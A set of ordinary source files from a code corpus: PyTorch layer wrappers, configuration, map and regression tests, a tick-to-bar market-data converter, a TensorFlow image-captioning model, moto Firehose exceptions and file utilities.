def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalMaxPool3d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_max_pool3d(input, 1)
class RNNBase(nn.RNNBase):
def __init__(self,mode, input_size, hidden_size,
num_layers=1, bias=True, batch_first=False,
dropout=0, bidirectional=False,weight_init=None):
"""
:param mode:
:param input_size:
:param hidden_size:
:param num_layers:
:param bias:
:param batch_first:
:param dropout:
:param bidirectional:
:param weight_init:
"""
super(RNNBase,self).__init__(mode, input_size, hidden_size,
num_layers, bias, batch_first, dropout,bidirectional)
if weight_init is not None:
for weight in super(RNNBase, self).parameters():
weight_init(weight)
class RNN(RNNBase):
def __init__(self, *args, **kwargs):
"""
:param args:
:param kwargs:
"""
if 'nonlinearity' in kwargs:
if kwargs['nonlinearity'] == 'tanh':
mode = 'RNN_TANH'
elif kwargs['nonlinearity'] == 'relu':
mode = 'RNN_RELU'
else:
raise ValueError("Unknown nonlinearity '{}'".format(
kwargs['nonlinearity']))
del kwargs['nonlinearity']
else:
mode = 'RNN_TANH'
super(RNN, self).__init__(mode, *args, **kwargs)
class GRU(RNNBase):
def __init__(self, *args, **kwargs):
"""
:param args:
:param kwargs:
"""
super(GRU, self).__init__('GRU', *args, **kwargs)
class LSTM(RNNBase):
def __init__(self, *args, **kwargs):
"""
:param args:
:param kwargs:
"""
super(LSTM, self).__init__('LSTM', *args, **kwargs)
class Swish(nn.Module):
def __init__(self):
super(Swish, self).__init__()
def forward(self, inputs):
return inputs * torch.sigmoid(inputs)
class GroupNorm(nn.GroupNorm):
def __init__(self, *args,weight_init=None,bias_init=None):
"""
:param args:
:param weight_init:
:param bias_init:
"""
super(GroupNorm,self).__init__(*args)
if weight_init is not None:
weight_init(self.weight.data)
if bias_init is not None:
bias_init(self.bias.data)
class LayerNorm(nn.LayerNorm):
def __init__(self, *args,weight_init=None,bias_init=None):
"""
:param args:
:param weight_init:
:param bias_init:
"""
super(LayerNorm,self).__init__(*args)
if weight_init is not None:
weight_init(self.weight.data)
if bias_init is not None:
bias_init(self.bias.data)
class Embedding(nn.Embedding):
def __init__(self,num_embeddings, embedding_dim, padding_idx=None,
max_norm=None, norm_type=2, scale_grad_by_freq=False,
sparse=False, _weight=None,weight_init=None):
"""
:param num_embeddings:
:param embedding_dim:
:param padding_idx:
:param max_norm:
:param norm_type:
:param scale_grad_by_freq:
:param sparse:
:param _weight:
:param weight_init:
"""
super(Embedding,self).__init__(num_embeddings, embedding_dim, padding_idx,
max_norm, norm_type, scale_grad_by_freq,
sparse, _weight)
if weight_init is not None:
weight_init(self.weight.data)
class BatchNorm(_BatchNorm):
def __init__(self,num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True,weight_init=None,bias_init=None):
"""
:param num_features:
:param eps:
:param momentum:
:param affine:
:param track_running_stats:
:param weight_init:
:param bias_init:
"""
super(BatchNorm,self).__init__(num_features, eps, momentum,affine,
track_running_stats)
if weight_init is not None:
weight_init(self.weight.data)
if bias_init is not None:
bias_init(self.bias.data)
class BatchNorm1d(BatchNorm):
def _check_input_dim(self, input):
if input.dim() != 2 and input.dim() != 3:
raise ValueError('expected 2D or 3D input (got {}D input)'
.format(input.dim()))
class BatchNorm2d(BatchNorm):
def _check_input_dim(self, input):
if input.dim() != 4:
raise ValueError('expected 4D input (got {}D input)'
.format(input.dim()))
class BatchNorm3d(BatchNorm):
def _check_input_dim(self, input):
if input.dim() != 5:
            raise ValueError('expected 5D input (got {}D input)'.format(input.dim()))
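

# Hypothetical smoke test (not part of the original module): stack a few of the
# layers defined above and push a random batch through them.
if __name__ == "__main__":
    model = nn.Sequential(
        Conv2d(3, 16, kernel_size=3, padding=1),
        BatchNorm2d(16),
        Swish(),
        GlobalAvgPool2d(flatten=True),
        Linear(16, 10),
    )
    out = model(torch.randn(2, 3, 32, 32))
    print(out.size())  # expected: torch.Size([2, 10])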
|
chapter10-图像描述(Image Caption)/config.py | 1364354238/PYTORCH_LEARNING | 137 | 12664498 | #coding:utf8
class Config:
    caption_data_path='caption.pth'  # preprocessed human-written caption data
img_path='/home/cy/caption_data/'
# img_path='/mnt/ht/aichallenger/raw/ai_challenger_caption_train_20170902/caption_train_images_20170902/'
    img_feature_path = 'results.pth'  # features of all images, a 200k x 2048 tensor
scale_size = 300
img_size = 224
batch_size=8
shuffle = True
num_workers = 4
rnn_hidden = 256
embedding_dim = 256
num_layers = 2
share_embedding_weights=False
    prefix='checkpoints/caption'  # prefix for saved model checkpoints
env = 'caption'
plot_every = 10
debug_file = '/tmp/debugc'
    model_ckpt = None  # path of a checkpoint to resume the model from
lr=1e-3
use_gpu=True
epoch = 1
test_img = 'img/example.jpeg'
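
# Usage sketch (illustrative): instantiate and override attributes before training:
#
#   opt = Config()
#   opt.batch_size = 16
#   opt.use_gpu = False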
|
nuplan/common/maps/nuplan_map/test/test_intersection.py | motional/nuplan-devkit | 128 | 12664501 | from typing import Any, Dict
import pytest
from nuplan.common.actor_state.state_representation import Point2D
from nuplan.common.maps.abstract_map import SemanticMapLayer
from nuplan.common.maps.abstract_map_objects import Intersection
from nuplan.common.maps.nuplan_map.map_factory import NuPlanMapFactory
from nuplan.common.maps.test_utils import add_map_objects_to_scene
from nuplan.common.utils.testing.nuplan_test import NUPLAN_TEST_PLUGIN, nuplan_test
from nuplan.database.tests.nuplan_db_test_utils import get_test_maps_db
maps_db = get_test_maps_db()
map_factory = NuPlanMapFactory(maps_db)
@nuplan_test(path='json/intersections/on_intersection.json')
def test_get_intersections(scene: Dict[str, Any]) -> None:
"""
Test getting intersections at a point.
"""
nuplan_map = map_factory.build_map_from_name(scene["map"]["area"])
for marker, expected_id in zip(scene["markers"], scene["xtr"]["expected_nearest_id"]):
pose = marker["pose"]
intersection: Intersection = nuplan_map.get_one_map_object(
Point2D(pose[0], pose[1]), SemanticMapLayer.INTERSECTION
)
assert intersection is not None
assert expected_id == intersection.id
assert intersection.contains_point(Point2D(pose[0], pose[1]))
add_map_objects_to_scene(scene, [intersection])
@nuplan_test(path='json/intersections/nearby.json')
def test_get_nearby_intersection(scene: Dict[str, Any]) -> None:
"""
    Test getting nearby intersections.
"""
nuplan_map = map_factory.build_map_from_name(scene["map"]["area"])
for marker, expected_distance, expected_id in zip(
scene["markers"], scene["xtr"]["expected_nearest_distance"], scene["xtr"]["expected_nearest_id"]
):
pose = marker["pose"]
intersection_id, distance = nuplan_map.get_distance_to_nearest_map_object(
Point2D(pose[0], pose[1]), SemanticMapLayer.INTERSECTION
)
assert intersection_id is not None
assert expected_distance == distance
assert expected_id == intersection_id
intersection: Intersection = nuplan_map.get_map_object(intersection_id, SemanticMapLayer.INTERSECTION)
add_map_objects_to_scene(scene, [intersection])
if __name__ == "__main__":
raise SystemExit(pytest.main([__file__], plugins=[NUPLAN_TEST_PLUGIN]))
|
tools/linux/tk2bar.py | sz6636/DataCore | 144 | 12664511 | <reponame>sz6636/DataCore
from tkreader import TkReader
import pandas as pd
import numpy as np
import datetime as dt
import traceback
bar_fields = ['date', 'trade_date', 'time', 'volume_inc', 'turnover_inc', 'settle', 'oi',
'open', 'high', 'low', 'close', 'volume', 'turnover',
'askprice1', 'askprice2', 'askprice3', 'askprice4', 'askprice5',
'bidprice1', 'bidprice2', 'bidprice3', 'bidprice4', 'bidprice5',
'askvolume1', 'askvolume2', 'askvolume3', 'askvolume4', 'askvolume5',
'bidvolume1', 'bidvolume2', 'bidvolume3', 'bidvolume4', 'bidvolume5']
integer_fields = ['date', 'trade_date', 'time', 'volume', 'turnover', 'settle', 'oi',
'open', 'high', 'low', 'close', 'volume_total', 'turnover_total',
'askprice1', 'askprice2', 'askprice3', 'askprice4', 'askprice5',
'bidprice1', 'bidprice2', 'bidprice3', 'bidprice4', 'bidprice5',
'askvolume1', 'askvolume2', 'askvolume3', 'askvolume4', 'askvolume5',
'bidvolume1', 'bidvolume2', 'bidvolume3', 'bidvolume4', 'bidvolume5']
update_fields = ['trade_date', 'settle', 'oi',
'volume', 'turnover',
'askprice1', 'askprice2', 'askprice3', 'askprice4', 'askprice5',
'bidprice1', 'bidprice2', 'bidprice3', 'bidprice4', 'bidprice5',
'askvolume1', 'askvolume2', 'askvolume3', 'askvolume4', 'askvolume5',
'bidvolume1', 'bidvolume2', 'bidvolume3', 'bidvolume4', 'bidvolume5']
def mstime2daymillis(time):
ms = time % 1000
tmp = time / 1000
ss = tmp % 100
tmp = tmp / 100
mm = tmp % 100
tmp = tmp / 100
hh = tmp
return (( hh * 60 + mm ) * 60 + ss ) * 1000 + ms
def daymillis2mstime(time):
ms = time % 1000
tmp = time / 1000
ss = tmp % 60
tmp = tmp / 60
mm = tmp % 60
tmp = tmp / 60
hh = tmp % 60
return ((hh * 100 + mm ) * 100 + ss) * 1000 + ms
def time2daymillis(time):
return mstime2daymillis(time*1000)
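# Worked example (illustrative): 09:30:15 written as the integer time stamp 93015.
#   time2daymillis(93015)      == (9*3600 + 30*60 + 15) * 1000 == 34215000
#   daymillis2mstime(34215000) == 93015000   # HHMMSSmmm, zero milliseconds
# Note: these helpers rely on Python 2 integer division ('/').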
def get_next_date(date):
date_str = "%d"%date
t1 = dt.datetime.strptime(date_str, "%Y%m%d")
t2 = t1 + dt.timedelta(days=1)
return t2.date().year * 10000 + t2.date().month*100 + t2.date().day
def get_pre_date(date):
date_str = "%d"%date
t1 = dt.datetime.strptime(date_str, "%Y%m%d")
t2 = t1 - dt.timedelta(days=1)
return t2.date().year * 10000 + t2.date().month*100 + t2.date().day
def get_dt_time(bar):
time = bar.get("time")
# time = daymillis2mstime(int(bar.get("time"))) / 1000
date = bar.get("date")
year = date / 10000
month = date / 100 % 100
day = date % 100
hh = time / 10000
mm = time / 100 % 100
ss = time % 100
return dt.datetime(year,month,day,hh,mm,ss,0)
class TimeUtil:
def __init__(self):
self.night_begin = time2daymillis(200000)
self.night_end = time2daymillis(30000)
self.oneday_millis = 24 * 60 * 60 * 1000
self.calendar = pd.DataFrame.from_csv('./calendar.csv',parse_dates=False).index.tolist()
aucttime = {
'SZ': [(93000,113000), (130000,150000)],
'SH': [(93000,113000), (130000,150000)],
'DCE':[(210000,23000), (90000,101500), (103000,113000),(133000,150000)],
'SHF':[(210000,23000), (90000,101500), (103000,113000),(133000,150000)],
'CZC':[(210000,23000), (90000,101500), (103000,113000),(133000,150000)],
'CFE_IF':[(93000,113000), (130000,150000)],
'CFE_BF':[(91500,113000), (130000,151500)]
}
self.aucttime = {}
for k,v in aucttime.items():
bartime = []
for pair in v:
bartime.append( (time2daymillis(pair[0]), time2daymillis(pair[1])) )
self.aucttime[k] = bartime
def daymillis_cmp(self,t1, t2):
if (t1 > self.night_begin) :
if (t2 > self.night_begin) :
if t1 > t2 :
return 1
elif t1 < t2 :
return -1
else :
return 0
else:
return -1
else :
if (t2 > self.night_begin) :
return 1
else:
if t1 > t2 :
return 1
elif t1 < t2 :
return -1
else :
return 0
def get_code_mkt(self,symbol):
code = ''
tmp = symbol.split('.')
mkt = tmp[1]
code = tmp[0]
if mkt == 'CFE':
if code.startswith('T'):
mkt += '_BF'
else:
mkt += '_IF'
return (code,mkt)
def get_begintime(self,symbol):
code, mkt = self.get_code_mkt(symbol)
tradetime = self.aucttime.get(mkt)
begintime = tradetime[0]
return begintime
def is_tradetime(self,symbol, time):
code, mkt = self.get_code_mkt(symbol)
daymillis = time
tradetime = self.aucttime.get(mkt)
for pair in tradetime:
if self.daymillis_cmp(daymillis,pair[0]) >= 0 and self.daymillis_cmp(daymillis,pair[1]) <= 0:
return True
return False
def daymillis_minus(self,t1,t2):
if t1 >= t2:
return t1-t2
else:
return t1-t2 + self.oneday_millis
def daymillis_plus(self,t1,t2):
return (t1+t2)%self.oneday_millis
class tk2bar(object):
    '''
    Convert tick (.tk) data files into OHLC bar data at a fixed frequency
    and save the resulting bars per symbol into an HDF5 file.
    '''
def __init__(self, user, passwd):
self.user = user
self.passwd = <PASSWORD>
self.tkreader = TkReader()
if( not self.tkreader.login(user, passwd)):
print("login failed")
return False
self.start_time = "21:00:00"
self.end_time = "15:30:00"
self.bar_map = {}
self.trade_date = 0
self.cycle = 0
self.timeutil = TimeUtil()
self.trade_time_map = {}
'''
Constructor
'''
def format_df(self, dict):
df = pd.DataFrame.from_dict(dict)
df.loc[:,'time'] = df.loc[:,'time'].astype("int64")
df.loc[:,'time'] = df.loc[:,'time'].apply(daymillis2mstime)
df.loc[:,'time'] /= 1000
df.rename(columns={'turnover':'turnover_total'}, inplace=True)
df.rename(columns={'volume':'volume_total'}, inplace=True)
df.rename(columns={'turnover_inc':'turnover'}, inplace=True)
df.rename(columns={'volume_inc':'volume'}, inplace=True)
df.loc[:,'volume'] = df.loc[:,'volume_total'] - df.loc[:,'volume_total'].shift(1)
df.loc[:,'turnover'] = df.loc[:,'turnover_total'] - df.loc[:,'turnover_total'].shift(1)
df.loc[0,'volume'] = df.loc[0,'volume_total']
df.loc[0,'turnover'] = df.loc[0,'turnover_total']
df.loc[:,'open' ] *= 10000
df.loc[:,'high' ] *= 10000
df.loc[:,'low' ] *= 10000
df.loc[:,'close' ] *= 10000
df.loc[:,'settle' ] *= 10000
df.loc[:,'askprice1' ] *= 10000
df.loc[:,'askprice2' ] *= 10000
df.loc[:,'askprice3' ] *= 10000
df.loc[:,'askprice4' ] *= 10000
df.loc[:,'askprice5' ] *= 10000
df.loc[:,'bidprice1' ] *= 10000
df.loc[:,'bidprice2' ] *= 10000
df.loc[:,'bidprice3' ] *= 10000
df.loc[:,'bidprice4' ] *= 10000
df.loc[:,'bidprice5' ] *= 10000
for field in integer_fields:
df.loc[:,field] = df.loc[:,field].astype("int64")
time = df.apply(get_dt_time, axis=1)
df.index = time
return df
def get_trade_time(self, symbol):
code,mkt = self.timeutil.get_code_mkt(symbol)
if not self.trade_time_map.has_key(mkt):
id = 0
bar_times = []
id_map = {}
trade_time = self.timeutil.aucttime.get(mkt)
for pair in trade_time:
time = self.timeutil.daymillis_plus(pair[0], self.cycle)
while self.timeutil.daymillis_cmp(time, pair[1]) <= 0:
bar_times.append(time)
id_map[time] = id
id += 1
time = self.timeutil.daymillis_plus(time, self.cycle)
self.trade_time_map[mkt] = {'id_map': id_map, 'bar_times': bar_times}
return self.trade_time_map[mkt]
def tick2bar(self, file_name, trade_dt, mkt, freq, out_dir):
if (not self.tkreader.open(file_name, "", self.start_time, self.end_time)):
print("can't open file %s " %file_name)
return False
self.trade_date = trade_dt
if trade_dt not in self.timeutil.calendar:
return False
dt_id = self.timeutil.calendar.index(trade_dt)
self.night_date = self.timeutil.calendar[dt_id-1]
self.midnight_date = get_next_date(self.night_date)
if freq == '5M':
self.cycle = 5 * 60 * 1000
elif freq == '15M':
self.cycle = 15 * 60 * 1000
else:
self.cycle = 60 * 1000
out_file = mkt + str(trade_dt) + '-' + freq + '.h5'
out_file = out_dir + out_file
i = 0
tk = self.tkreader.get_next()
while tk is not None:
self.on_tick(tk)
i += 1
if i % 50000 == 0:
print('read %d ticks'%i)
tk = self.tkreader.get_next()
data = pd.HDFStore(out_file,'a')
for k,v in self.bar_map.items():
try:
# print k
self.makeup_bars(v)
bars = v.get('bars')
df = self.format_df(bars)
data[k] = df
except Exception, e:
traceback.print_exc()
data.close()
#return data
def makeup_bars(self, bardata):
bars = bardata.get('bars')
ids = bardata.get('ids')
ids_size= len(ids)
first_id = ids[0]
last_id = ids[-1]
preclose = bardata.get('preclose')
if(first_id > 0):
for i in range(0,first_id):
bars['open'][i] = preclose
bars['high'][i] = preclose
bars['low'][i] = preclose
bars['close'][i] = preclose
if last_id < len(bars['time'])-1:
ids.append(len(bars['time'])-1)
if ids_size > 2:
for i in range(1,ids_size):
head = ids[i-1]
tail = ids[i]
if (head+1) < tail:
close = bars['close'][head]
bars['open'][head+1:tail] = close
bars['high'][head+1:tail] = close
bars['low'][head+1:tail] = close
bars['close'][head+1:tail] = close
bars['volume' ][head+1:tail] = bars['volume' ][head]
bars['turnover'][head+1:tail] = bars['turnover'][head]
bars['oi' ][head+1:tail] = bars['oi' ][head]
bars['settle' ][head+1:tail] = bars['settle' ][head]
bars['trade_date'][head+1:tail] = bars['trade_date'][head]
def new_bardata(self,bar_time_list):
last = None
first = None
bars = {}
size = len(bar_time_list)
for field in bar_fields :
if field == 'time' :
bars[field] = np.array(bar_time_list)
else:
bars[field] = np.zeros(size)
time_array = bars['time']
date_array = bars['date']
for i in range(0,len(time_array)):
if time_array[i] > self.timeutil.night_begin:
date_array[i] = self.night_date
elif time_array[i] < self.timeutil.night_end:
date_array[i] = self.midnight_date
else:
date_array[i] = self.trade_date
bars['low'] += 999999999.0
return {'bars': bars,'preclose':0.0, 'ids':[]}
def new_bar(self):
bar = {}
for field in bar_fields :
bar[field] = None
return bar
def get_bartime(self, daymillis):
bartime = (daymillis / self.cycle + 1) * self.cycle
return bartime
def on_tick(self, tk):
time = tk['time']
symbol = tk['symbol']
# print(time,symbol,tk['volume'],tk['turnover'])
daymillis = mstime2daymillis(time)
barmillis = self.get_bartime(daymillis)
trade_time = self.get_trade_time(symbol)
id_map = trade_time['id_map']
bar_time_list = trade_time['bar_times']
if not id_map.has_key(barmillis) :
return
if not self.timeutil.is_tradetime(symbol, daymillis):
return
if not self.bar_map.has_key(symbol):
self.bar_map[symbol] = self.new_bardata(bar_time_list)
id = id_map.get(barmillis)
bardata = self.bar_map.get(symbol)
bardata['preclose'] = tk['preclose']
barlist = bardata.get('bars')
if len(bardata['ids']) == 0 :
bardata['ids'].append(id)
elif bardata['ids'][-1] < id:
bardata['ids'].append(id)
last = tk['last']
if (barlist['open'][id] < 0.000001):
barlist['open'][id] = last
if barlist['high'][id] < last:
barlist['high'][id] = last
if barlist['low'][id] > last:
barlist['low'][id] = last
barlist['close'][id] = last
for field in update_fields:
if tk.has_key(field):
barlist[field][id] = tk[field]
if __name__ == '__main__':
user = "phone number"
passwd = "<PASSWORD>"
convert = tk2bar(user,passwd)
try :
convert.tick2bar('./SHF20171218.tk', 20171218, 'SHF','1M','./')
except Exception, e:
traceback.print_exc()
raise e
|
tika-parsers/src/main/resources/org/apache/tika/parser/captioning/tf/model_wrapper.py | dedabob/tika | 1,299 | 12664522 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import tensorflow as tf
from tensorflow.contrib.slim.python.slim.nets.inception_v3 import inception_v3_base
slim = tf.contrib.slim
class ModelWrapper(object):
"""
Model wrapper class to perform image captioning with a ShowAndTellModel
"""
def __init__(self):
super(ModelWrapper, self).__init__()
def build_graph(self, checkpoint_path):
"""Builds the inference graph"""
tf.logging.info("Building model.")
ShowAndTellModel().build()
saver = tf.train.Saver()
return self._create_restore_fn(checkpoint_path, saver)
def _create_restore_fn(self, checkpoint_path, saver):
"""Creates a function that restores a model from checkpoint file"""
if tf.gfile.IsDirectory(checkpoint_path):
checkpoint_path = tf.train.latest_checkpoint(checkpoint_path)
if not checkpoint_path:
raise ValueError("No checkpoint file found in: %s" % checkpoint_path)
def _restore_fn(sess):
tf.logging.info("Loading model from checkpoint: %s", checkpoint_path)
saver.restore(sess, checkpoint_path)
tf.logging.info("Successfully loaded checkpoint: %s",
os.path.basename(checkpoint_path))
return _restore_fn
def feed_image(self, sess, encoded_image):
initial_state = sess.run(fetches="lstm/initial_state:0",
feed_dict={"image_feed:0": encoded_image})
return initial_state
def inference_step(self, sess, input_feed, state_feed):
softmax_output, state_output = sess.run(
fetches=["softmax:0", "lstm/state:0"],
feed_dict={
"input_feed:0": input_feed,
"lstm/state_feed:0": state_feed,
})
return softmax_output, state_output
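# Example inference loop (illustrative sketch; the checkpoint path, the start
# token id and the caption length below are assumptions, not part of this module):
#
#     model = ModelWrapper()
#     restore_fn = model.build_graph("/path/to/checkpoint")   # hypothetical path
#     with tf.Session() as sess:
#         restore_fn(sess)
#         state = model.feed_image(sess, encoded_jpeg_bytes)
#         words = [start_word_id]                              # vocab start token
#         for _ in range(20):                                  # greedy decoding
#             softmax, state = model.inference_step(sess, [words[-1]], state)
#             words.append(int(softmax[0].argmax()))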
class ShowAndTellModel(object):
"""
Image captioning implementation based on the paper,
"Show and Tell: A Neural Image Caption Generator"
<NAME>, <NAME>, <NAME>, <NAME>
For more details, please visit : http://arxiv.org/abs/1411.4555
"""
def __init__(self):
# scale used to initialize model variables
self.initializer_scale = 0.08
# dimensions of Inception v3 input images
self.image_height = 299
self.image_width = 299
# LSTM input and output dimensionality, respectively
self.embedding_size = 512
self.num_lstm_units = 512
# number of unique words in the vocab (plus 1, for <UNK>)
# the default value is larger than the expected actual vocab size to allow
# for differences between tokenizer versions used in preprocessing, there is
# no harm in using a value greater than the actual vocab size, but using a
# value less than the actual vocab size will result in an error
self.vocab_size = 12000
# reader for the input data
self.reader = tf.TFRecordReader()
# to match the "Show and Tell" paper we initialize all variables with a
# random uniform initializer
self.initializer = tf.random_uniform_initializer(
minval=-self.initializer_scale,
maxval=self.initializer_scale)
# a float32 Tensor with shape [batch_size, height, width, channels]
self.images = None
# an int32 Tensor with shape [batch_size, padded_length]
self.input_seqs = None
# an int32 Tensor with shape [batch_size, padded_length]
self.target_seqs = None
# an int32 0/1 Tensor with shape [batch_size, padded_length]
self.input_mask = None
# a float32 Tensor with shape [batch_size, embedding_size]
self.image_embeddings = None
# a float32 Tensor with shape [batch_size, padded_length, embedding_size]
self.seq_embeddings = None
# collection of variables from the inception submodel
self.inception_variables = []
# global step Tensor
self.global_step = None
def process_image(self, encoded_image, resize_height=346, resize_width=346, thread_id=0):
"""Decodes and processes an image string"""
# helper function to log an image summary to the visualizer. Summaries are
# only logged in thread 0
def image_summary(name, img):
if not thread_id:
tf.summary.image(name, tf.expand_dims(img, 0))
# decode image into a float32 Tensor of shape [?, ?, 3] with values in [0, 1)
with tf.name_scope("decode", values=[encoded_image]):
image = tf.image.decode_jpeg(encoded_image, channels=3)
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
image_summary("original_image", image)
# resize image
assert (resize_height > 0) == (resize_width > 0)
if resize_height:
image = tf.image.resize_images(image,
size=[resize_height, resize_width],
method=tf.image.ResizeMethod.BILINEAR)
# central crop, assuming resize_height > height, resize_width > width
image = tf.image.resize_image_with_crop_or_pad(image, self.image_height, self.image_width)
image_summary("resized_image", image)
image_summary("final_image", image)
# rescale to [-1,1] instead of [0, 1]
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image
def build_inputs(self):
"""Input prefetching, preprocessing and batching"""
image_feed = tf.placeholder(dtype=tf.string, shape=[], name="image_feed")
input_feed = tf.placeholder(dtype=tf.int64,
shape=[None], # batch_size
name="input_feed")
# process image and insert batch dimensions
images = tf.expand_dims(self.process_image(image_feed), 0)
input_seqs = tf.expand_dims(input_feed, 1)
# no target sequences or input mask in inference mode
target_seqs = None
input_mask = None
self.images = images
self.input_seqs = input_seqs
self.target_seqs = target_seqs
self.input_mask = input_mask
def build_image_embeddings(self):
"""Builds the image model(Inception V3) subgraph and generates image embeddings"""
# parameter initialization
batch_norm_params = {
"is_training": False,
"trainable": False,
# decay for the moving averages
"decay": 0.9997,
# epsilon to prevent 0s in variance
"epsilon": 0.001,
# collection containing the moving mean and moving variance
"variables_collections": {
"beta": None,
"gamma": None,
"moving_mean": ["moving_vars"],
"moving_variance": ["moving_vars"],
}
}
stddev = 0.1,
dropout_keep_prob = 0.8
with tf.variable_scope("InceptionV3", "InceptionV3", [self.images]) as scope:
with slim.arg_scope(
[slim.conv2d, slim.fully_connected],
weights_regularizer=None,
trainable=False):
with slim.arg_scope(
[slim.conv2d],
weights_initializer=tf.truncated_normal_initializer(stddev=stddev),
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params):
net, end_points = inception_v3_base(self.images, scope=scope)
with tf.variable_scope("logits"):
shape = net.get_shape()
net = slim.avg_pool2d(net, shape[1:3], padding="VALID", scope="pool")
net = slim.dropout(
net,
keep_prob=dropout_keep_prob,
is_training=False,
scope="dropout")
net = slim.flatten(net, scope="flatten")
# add summaries
for v in end_points.values():
tf.contrib.layers.summaries.summarize_activation(v)
self.inception_variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope="InceptionV3")
# map inception output(net) into embedding space
with tf.variable_scope("image_embedding") as scope:
image_embeddings = tf.contrib.layers.fully_connected(
inputs=net,
num_outputs=self.embedding_size,
activation_fn=None,
weights_initializer=self.initializer,
biases_initializer=None,
scope=scope)
# save the embedding size in the graph
tf.constant(self.embedding_size, name="embedding_size")
self.image_embeddings = image_embeddings
def build_seq_embeddings(self):
"""Builds the input sequence embeddings"""
with tf.variable_scope("seq_embedding"), tf.device("/cpu:0"):
embedding_map = tf.get_variable(
name="map",
shape=[self.vocab_size, self.embedding_size],
initializer=self.initializer)
seq_embeddings = tf.nn.embedding_lookup(embedding_map, self.input_seqs)
self.seq_embeddings = seq_embeddings
def build_model(self):
# this LSTM cell has biases and outputs tanh(new_c) * sigmoid(o), but the
# modified LSTM in the "Show and Tell" paper has no biases and outputs
# new_c * sigmoid(o).
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_units=self.num_lstm_units, state_is_tuple=True)
with tf.variable_scope("lstm", initializer=self.initializer) as lstm_scope:
# feed the image embeddings to set the initial LSTM state
zero_state = lstm_cell.zero_state(
batch_size=self.image_embeddings.get_shape()[0], dtype=tf.float32)
_, initial_state = lstm_cell(self.image_embeddings, zero_state)
# allow the LSTM variables to be reused
lstm_scope.reuse_variables()
# because this is inference mode,
# use concatenated states for convenient feeding and fetching
tf.concat(axis=1, values=initial_state, name="initial_state")
# placeholder for feeding a batch of concatenated states
state_feed = tf.placeholder(dtype=tf.float32,
shape=[None, sum(lstm_cell.state_size)],
name="state_feed")
state_tuple = tf.split(value=state_feed, num_or_size_splits=2, axis=1)
# run a single LSTM step
lstm_outputs, state_tuple = lstm_cell(
inputs=tf.squeeze(self.seq_embeddings, axis=[1]),
state=state_tuple)
# concatentate the resulting state
tf.concat(axis=1, values=state_tuple, name="state")
# stack batches vertically
lstm_outputs = tf.reshape(lstm_outputs, [-1, lstm_cell.output_size])
with tf.variable_scope("logits") as logits_scope:
logits = tf.contrib.layers.fully_connected(
inputs=lstm_outputs,
num_outputs=self.vocab_size,
activation_fn=None,
weights_initializer=self.initializer,
scope=logits_scope)
tf.nn.softmax(logits, name="softmax")
def setup_global_step(self):
"""Sets up the global step Tensor"""
global_step = tf.Variable(
initial_value=0,
name="global_step",
trainable=False,
collections=[tf.GraphKeys.GLOBAL_STEP, tf.GraphKeys.GLOBAL_VARIABLES])
self.global_step = global_step
def build(self):
self.build_inputs()
self.build_image_embeddings()
self.build_seq_embeddings()
self.build_model()
self.setup_global_step()
|
tests/test_ridgereg.py | GabrielWen/spartan | 156 | 12664528 | <filename>tests/test_ridgereg.py
from spartan.examples import ridge_regression
import test_common
from test_common import millis
from spartan import expr, util
import time
N_EXAMPLES = 100
N_DIM = 3
ITERATION = 10
class TestRidgeRegression(test_common.ClusterTest):
def test_ridgereg(self):
ridge_regression.run(N_EXAMPLES, N_DIM, ITERATION)
def benchmark_ridgereg(ctx, timer):
print "#worker:", ctx.num_workers
#N_EXAMPLES = 100000000 * ctx.num_workers
N_EXAMPLES = 90000000 * ctx.num_workers
x = expr.rand(N_EXAMPLES, N_DIM)
y = expr.rand(N_EXAMPLES, 1)
start = time.time()
ridge_regression.ridge_regression(x, y, 1, ITERATION)
total = time.time() - start
util.log_warn("time cost : %s s" % (total*1.0/ITERATION,))
if __name__ == '__main__':
test_common.run(__file__)
|
moto/firehose/exceptions.py | oakbramble/moto | 5,460 | 12664536 | <gh_stars>1000+
"""Exceptions raised by the Firehose service."""
from moto.core.exceptions import JsonRESTError
class ConcurrentModificationException(JsonRESTError):
"""Existing config has a version ID that does not match given ID."""
code = 400
def __init__(self, message):
super().__init__("ConcurrentModificationException", message)
class InvalidArgumentException(JsonRESTError):
"""The specified input parameter has a value that is not valid."""
code = 400
def __init__(self, message):
super().__init__("InvalidArgumentException", message)
class LimitExceededException(JsonRESTError):
"""You have already reached the limit for a requested resource."""
code = 400
def __init__(self, message):
super().__init__("LimitExceededException", message)
class ResourceInUseException(JsonRESTError):
"""The resource is already in use and not available for this operation."""
code = 400
def __init__(self, message):
super().__init__("ResourceInUseException", message)
class ResourceNotFoundException(JsonRESTError):
"""The specified resource could not be found."""
code = 400
def __init__(self, message):
super().__init__("ResourceNotFoundException", message)
class ValidationException(JsonRESTError):
"""The tag key or tag value is not valid."""
code = 400
def __init__(self, message):
super().__init__("ValidationException", message)
|
midi_ddsp/utils/file_utils.py | magenta/midi-ddsp | 169 | 12664565 | """Utility functions for file io and file path reading."""
# Copyright 2021 The DDSP Authors.
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Lint as: python3
import os
import shutil
import pickle
import json
def get_folder_name(path, num=1):
"""
Get the name of the folder n levels above the given path.
